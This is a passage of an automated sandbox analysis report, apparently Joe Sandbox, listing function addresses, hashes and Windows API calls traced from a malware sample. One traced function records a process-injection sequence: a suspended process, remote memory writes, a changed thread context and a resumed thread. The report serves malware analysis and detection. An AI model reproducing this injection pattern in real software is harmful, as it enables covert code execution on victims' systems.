Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 593203224-0
Opcode ID: 5d5fe9f993740efe5a8205fe5ee9e8438bd6728f60b03222497b48f94cdf9ced
Instruction ID: 4b7a3c2d6c30e88c18773ece701c016eda0f74e421206734af4a842452366167
Opcode Fuzzy Hash: 5d5fe9f993740efe5a8205fe5ee9e8438bd6728f60b03222497b48f94cdf9ced
Instruction Fuzzy Hash: 2951A9B0901258DBDB21DF58C844BAEBBF0FF42314F248198E845AB381DB75AA09CBD1

Function 00852729 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00852730
std::_Lockit::_Lockit.LIBCPMT ref: 0085273B
std::_Lockit::~_Lockit.LIBCPMT ref: 008527A9

Part of subcall function 0085288C: std::locale::_Locimp::_Locimp.LIBCPMT ref: 008528A4

std::locale::_Setgloballocale.LIBCPMT ref: 00852756

Memory Dump Source

Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true

Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
String ID:
API String ID: 677527491-0
Opcode ID: 8c8e36cf63a23c8c75629523c62fbb1de5df3b63cd50c18d5e4472e6582cd9ba
Instruction ID: 4886e13da41a5c6d88342e185c33a9b43a8c32aa7615aa47a3dc4125dd0ffca0
Opcode Fuzzy Hash: 8c8e36cf63a23c8c75629523c62fbb1de5df3b63cd50c18d5e4472e6582cd9ba
Instruction Fuzzy Hash: 0101DF76A002108FCB0AEB28C84153E7BB1FFCA751B184009EC1597381CF34AE4ADBC6

Analysis Process: xq6J5KlULX6jlR3rET0T.exePID: 1096, Parent PID: 3108COMMON

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.5%
Total number of Nodes:	1514
Total number of Limit Nodes:	16

Executed Functions

Function 00C4018D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C402FC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00C4030F
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00C4032D
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00C40351
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00C4037C
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00C403D4
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 00C4041F
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00C4045D
Wow64SetThreadContext.KERNEL32(?,?), ref: 00C40499
ResumeThread.KERNELBASE(?), ref: 00C404A8

Strings

Load, xrefs: 00C401CB
ress, xrefs: 00C40217
GetP, xrefs: 00C4020F
aryA, xrefs: 00C401D3

Memory Dump Source

Source File: 00000007.00000002.2181235760.0000000000C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c40000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: GetP$Load$aryA$ress
API String ID: 2687962208-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 49ecbdcd13c0b8f8d31f0baba31c277a032ca4f124ddc8e1482bfe0f1fe5557e
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: D2B1E67664024AAFDB60CF68CC80BDA77A5FF88714F158524EA1CAB341D774FA418B94

Function 004F53CE Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d3a586ec2da16d7fd3ee7ee03ae3402aab8ac5a3c6cbba84838bbe677f8115f
Instruction ID: f5bf238da5adb0dafe320b6e3794dec4dc475f1d7106cc4c0b6b51acc62a3a36
Opcode Fuzzy Hash: 6d3a586ec2da16d7fd3ee7ee03ae3402aab8ac5a3c6cbba84838bbe677f8115f
Instruction Fuzzy Hash: D7E08C32911228EBCB18DB8EC90499AF3ECEB44B44B1140ABFA01D3201C2B4DE00CBD4

Function 004EC11D Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c992419eee8842309e7582ba631cfc6caef1f6ffe052a819ae54955aa5ef9da
Instruction ID: 78654487bf36cb5a41a69c4abf16c8c9bc482fb79d7dc62028747f462c131ef4
Opcode Fuzzy Hash: 4c992419eee8842309e7582ba631cfc6caef1f6ffe052a819ae54955aa5ef9da
Instruction Fuzzy Hash: 3AC08C34000E8087CE2A891986B13B673A4A3927CBFC0159ECA424BB83C51E9C83EB48

Function 004FC1F7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 42
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,ole,00000000,?,?,004FC2E6), ref: 004FC20B

Part of subcall function 004FC151: _Deallocate.LIBCONCRT ref: 004FC1EC

CreateThread.KERNELBASE(00000000,00000000,00000188,MZx,00000000,00000000), ref: 004FC23F
WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,004FC2E6), ref: 004FC24B
CloseHandle.KERNEL32(00000000,?,?,004FC2E6), ref: 004FC252

Strings

0*U, xrefs: 004FC212
MZx, xrefs: 004FC231
ole, xrefs: 004FC1FA

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: AllocCloseCreateDeallocateHandleObjectSingleThreadVirtualWait
String ID: 0*U$MZx$ole
API String ID: 440434604-2269876306
Opcode ID: 643c543c2d3fd6374fe667f4d54054173245f9a2b4ce8cb04b9da01c39d146f9
Instruction ID: 719f860f4201df7fb94c0a4470175f641cdc0c8bb4a888db5e78bf5ce9e33590
Opcode Fuzzy Hash: 643c543c2d3fd6374fe667f4d54054173245f9a2b4ce8cb04b9da01c39d146f9
Instruction Fuzzy Hash: 3DF0827660111C7FD12023639C8DEBB3A5CDB477EEF410125FB05951818E192C1286BD

Function 004EEFA8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,F4A61D19,?,004EF0B5,?,?,00000000,00000000), ref: 004EF069

Strings

ext-ms-, xrefs: 004EF013
api-ms-, xrefs: 004EEFFF

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: c0f5cbefcfd508e6069c8fc7a160a3e4f3e89a522c2bd84012edb82e0e03c99c
Instruction ID: d071e10a6e703b7110e06f07e50cd5d5406c37539c6c071e0a5196a723010175
Opcode Fuzzy Hash: c0f5cbefcfd508e6069c8fc7a160a3e4f3e89a522c2bd84012edb82e0e03c99c
Instruction Fuzzy Hash: 2E212B31E01290ABC7319723DC44A6B3759DF51376F200132E915AB392EB38ED05C6D9

Function 004F29E1 Relevance: 7.7, APIs: 5, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__alloca_probe_16.LIBCMT ref: 004F2A68
__alloca_probe_16.LIBCMT ref: 004F2B29
__freea.LIBCMT ref: 004F2B90

Part of subcall function 004F1DC1: HeapAlloc.KERNEL32(00000000,004E1FA6,?,?,004E57EA,?,?,?,00000000,?,004E17E2,004E1FA6,?,?,?,?), ref: 004F1DF3

__freea.LIBCMT ref: 004F2BA5
__freea.LIBCMT ref: 004F2BB5

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: d307ddaa44551018599d53ccbba3637ee2577585d95bda1304620684fe3a3106
Instruction ID: b3ebd4b7c2b096ae065eddc97ba3cdd022f870cd78f4f5198b854875c48acd20
Opcode Fuzzy Hash: d307ddaa44551018599d53ccbba3637ee2577585d95bda1304620684fe3a3106
Instruction Fuzzy Hash: 8551067260021EAFEF249F62CE41EBB37A8EF44314B14056AFE04E7240E7B8DD108769

Function 004EC0A9 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,004EC0A3,00000000,004E8CD2,?,?,F4A61D19,004E8CD2,?), ref: 004EC0BA
TerminateProcess.KERNEL32(00000000,?,004EC0A3,00000000,004E8CD2,?,?,F4A61D19,004E8CD2,?), ref: 004EC0C1
ExitProcess.KERNEL32 ref: 004EC0D3

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 3aebf73ef7382cfd5aaa383b364cf4b9f30b03ceef74c1ddbaf69186ef60b3b4
Instruction ID: 536db7fd72f4dc03ad15db7357933b4a7bf11051f0b0ef34991229f9de44e131
Opcode Fuzzy Hash: 3aebf73ef7382cfd5aaa383b364cf4b9f30b03ceef74c1ddbaf69186ef60b3b4
Instruction Fuzzy Hash: 8DD06771400544AFCB113F66ED4D9697F26AF4038AF044165B9498A132CF3A9963DA88

Function 004F4CFF Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004F482F: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 004F485A

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,004F4B46,?,00000000,?,00000000,?), ref: 004F4D60
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,004F4B46,?,00000000,?,00000000,?), ref: 004F4DA2

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: e14504b0b31b793bb4a31330bd1bd75779d4f2d380c92be4b9d160339a94d1d0
Instruction ID: 3dd67c202991466b1d96b44d01324378ce198562f11936ec5c5e6c452c1684cd
Opcode Fuzzy Hash: e14504b0b31b793bb4a31330bd1bd75779d4f2d380c92be4b9d160339a94d1d0
Instruction Fuzzy Hash: BA512570A002499EDB20DF76C8416BBBBF5FFC1304F14446FD29687251EB789A46CB98

Function 004EF442 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,004F2ACF,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 004EF476
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,004F2ACF,?,?,00000000,?,00000000), ref: 004EF494

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: a91e6475bea2361847bbb1f843bc501dcb8d2d10fbd5c249508ec43dd6fc7d64
Instruction ID: 3677924b9da7aaa2c4ce613986e76b42b335cc406bf464a5e366d99aacd506b7
Opcode Fuzzy Hash: a91e6475bea2361847bbb1f843bc501dcb8d2d10fbd5c249508ec43dd6fc7d64
Instruction Fuzzy Hash: 7CF0683250025ABBCF125F92DC059DE3E66BF583A5F058125FA1925160CB36C932EB99

Function 004F4903 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(E8458D00,?,004F4B52,004F4B46,00000000), ref: 004F4935

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 0fecab33a6350a8d119962674bee2b946a13fdf3d18fe0b76831155d49eead2c
Instruction ID: bae004c26c37f60546eb4e6552daaeb9446bb1fd969d314eb7b5d0b374ca66d1
Opcode Fuzzy Hash: 0fecab33a6350a8d119962674bee2b946a13fdf3d18fe0b76831155d49eead2c
Instruction Fuzzy Hash: 9E515DB1A0415C5ADB218E28CD80AF77BBCDB96304F2401EED69AD7142C7799D46DF28

Function 004EF073 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 893ddd73d7263c9530b1603ffad0a00200fa57fba1e363da0c03a3904a8e7649
Instruction ID: 2e43000173f5143b706189238fca945af932d6cfcad9cc76c83271bc7e498855
Opcode Fuzzy Hash: 893ddd73d7263c9530b1603ffad0a00200fa57fba1e363da0c03a3904a8e7649
Instruction Fuzzy Hash: F90168333002519F9B21CE2BEC0185B33E6FBC53227248036F901CB285EA39DC099795

Non-executed Functions

Function 004F7596 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,004F78B4,00000002,00000000,?,?,?,004F78B4,?,00000000), ref: 004F762F
GetLocaleInfoW.KERNEL32(?,20001004,004F78B4,00000002,00000000,?,?,?,004F78B4,?,00000000), ref: 004F7658
GetACP.KERNEL32(?,?,004F78B4,?,00000000), ref: 004F766D

Strings

ACP, xrefs: 004F75B4
OCP, xrefs: 004F75EA

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 6cc7dcdc49315342e4f9de4281d998c3154456ab795707b211f07c4a747e3205
Instruction ID: 860d4efa18ddd0b0924492a3835041cc0c5f06324212682b846ac1595ed47db2
Opcode Fuzzy Hash: 6cc7dcdc49315342e4f9de4281d998c3154456ab795707b211f07c4a747e3205
Instruction Fuzzy Hash: 1421B821608508AAEB348F19D904BB772A7EB54FB4B568426E70AC7710EB3EDD42C35C

Function 004F776B Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004EEA50: GetLastError.KERNEL32(?,00000008,004F2F56,00000000,004E8E50), ref: 004EEA54
Part of subcall function 004EEA50: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 004EEAF6

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 004F7877
IsValidCodePage.KERNEL32(00000000), ref: 004F78C0
IsValidLocale.KERNEL32(?,00000001), ref: 004F78CF
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 004F7917
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 004F7936

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 84cb5ed32be71522facbbfff427d59e3977a8e86933ca50f23eeb1cdc0db41a8
Instruction ID: ed88797451b8805f5707785ec38eb28e44832824be6b0f99df645cea27c2c334
Opcode Fuzzy Hash: 84cb5ed32be71522facbbfff427d59e3977a8e86933ca50f23eeb1cdc0db41a8
Instruction Fuzzy Hash: BC519171A04209AFEB10EFA5CC45ABF77B9BF04740F14442AEA01E7291EB7C9905CB69

Function 004F6E07 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004EEA50: GetLastError.KERNEL32(?,00000008,004F2F56,00000000,004E8E50), ref: 004EEA54
Part of subcall function 004EEA50: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 004EEAF6

GetACP.KERNEL32(?,?,?,?,?,?,004ECA5C,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004F6EC8
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004ECA5C,?,?,?,00000055,?,-00000050,?,?), ref: 004F6EF3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004F7056

Strings

utf8, xrefs: 004F6FC5

Memory Dump Source

